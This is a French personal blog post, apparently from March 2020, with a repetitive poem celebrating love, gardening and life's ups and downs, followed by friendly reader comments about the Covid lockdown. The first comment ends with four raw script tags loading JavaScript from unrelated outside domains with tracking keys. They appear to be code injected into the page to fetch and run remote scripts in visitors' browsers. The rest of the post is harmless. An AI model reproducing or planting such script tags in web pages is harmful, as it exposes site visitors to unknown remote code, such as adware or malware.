• AMOUR ET JARDINAGE

     

     

     

    AMOUR ET JARDINAGE

    UN  JARDIN  ET DES  FLEURS

     

    AMOUR  ET  JARDINAGE

     

    AMOUR  ET  JARDINAGE

     

    Sous le ciel de nos campagnes

    Rayonnent des jardins fleuris

    AMOUR  ET  JARDINAGE


    Jamais on ne s’y ennuie

    Car la Nature, la Beauté et l’Amour

     

    AMOUR  ET  JARDINAGE

     

    nous tiennent compagnie

    De l’aube jusqu’au bout de la nuit

    AMOUR  ET  JARDINAGE



    « Il faut cultiver notre jardin »

    disait Candide

    AMOUR  ET  JARDINAGE

    ELLE EST PAS BELLE LA VIE….

    Une graine est semée,

    la fleur croit puis elle fane

     

    AMOUR  ET  JARDINAGE

    On nait, on grandit, on meurt

     

    AMOUR  ET  JARDINAGE

     
    Trois
    mots simples

    Qui résument notre existence et pourtant

    que d’evenements heureux et malheureux

    ont jalonné notre route

    -

    AMOUR  ET  JARDINAGE

     

    Semer, planter avec soin et amour

     

    AMOUR  ET  JARDINAGE

    Voir l’apparition des premiéres fleurs

     

    AMOUR  ET  JARDINAGE

    Humer leur parfum

    Cueillir delicatement une rose pour l’offrir

    -

    AMOUR  ET  JARDINAGE

     

    Des instants d’emotions qui enrichissent le cœur

     

    AMOUR  ET  JARDINAGE

     


    Le jardinage est un grand plaisir…..

    Vivement la belle saison

    La temperature est si douce en Provence

    que je m’y crois déjà……

    mais, arretons de rever ….

    Nos chemins de vie sont remplis d’obstacles,

    et d'ornières, ........................

    -

    AMOUR  ET  JARDINAGE

     

    et quand on a réussi à les franchir, à les apprivoiser,

    à ne pas tomber, on apprécie les joies,

    et les petits bonheurs malgré les difficultés.....

    un sentier même tortueux

     

    AMOUR  ET  JARDINAGE

     

    devient l'autoroute du Bonheur

     

    AMOUR  ET  JARDINAGE

     

    AMOUR  ET  JARDINAGE

     

     

    AMOUR  ET  JARDINAGE

     

     

     

     

     

     


  • Commentaires

    1
    Samedi 21 Mars 2020 à 19:17

    Beau billet; Passe une bonne soirée bien au chaud car chez nous, il a fait

    frais aujourd'hui. Gros bisous étoilés -violette

     

    <script src="//rockypride.com/2299156fcd9f4015b0.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1584814738189" type="text/javascript"></script> <script src="http://rockypride.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    2
    Samedi 21 Mars 2020 à 19:28

    Bonjour Vaianae

    Merci pour cette farandole de belles fleurs à la vie....

    Amicalement Bérénice

    3
    Samedi 21 Mars 2020 à 20:20

    Coucou ma belle ...Tu as de la chance d’avoir un jardin ,car en ce moment cela occupe un peu .. 

    ici le petit balcon où on a vite fait le tour ...

     Chez moi j’ai au moins mes pelouses... Remi commence à en avoir marre d’être seul il ne dors pas bien.. enfin c’est la galère pour tous le mondes. 
    Ton  billet est très beau et bien fleuris.merci de ce partage .. Bon dimanche à vous deux .. 

    Gros bisous 

    MONIQUE ❤️❤️❤️❤️

    4
    Samedi 21 Mars 2020 à 23:24

    Coucou Vaianae,

    encore  une fois je viens tard mais toujours avec les mêmes problèmes d'ordi.

    Sachant que j’ai toujours les mêmes conditions de clavier qui me ralentissent   énormément, que j’ai été prise toute la journée hier et aujourd’hui aussi et tus les coups de tel famille et amis...

    Donc juste un petit mot pour e dire que j'apprécie ton article, sur les fleurs et la patience pour les cultiver. ... en attendant la bonne nouvelle qi te fera encore Mamie.

    Bisous virtuels de rigueur bon courage pour suivre le seule route possible.

     

    5
    Dimanche 22 Mars 2020 à 07:54

    La vie est courte, mais c'est un si joli chemin qu'il faut prendre le temps de la parcourir

    Passe une belle journée

    Amicalement

    Claude

    6
    Dimanche 22 Mars 2020 à 09:52

    Bonjour Vaiana, merci pour ton com sur ma page! Je suis très fatiguée! je pense à une fatigue morale! Je voulais faire des crêpes pour papa! pas pour moi parce que j'ai peur de manquer de denrées pour me faire des crêpes complètes! Je les apporterai à papa! Je te souhaite une bonne journée de confinement! bises

    7
    Dimanche 22 Mars 2020 à 16:01

    Bonjour Vaianae , oui jardiner fait beaucoup de bien au moral et au corps biensur ! . La police patrouille la plage et fait partir les promeneurs donc pas moyen d' y accéder ! . Bonne fin de journée de repos , gros bisous , escapade , 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :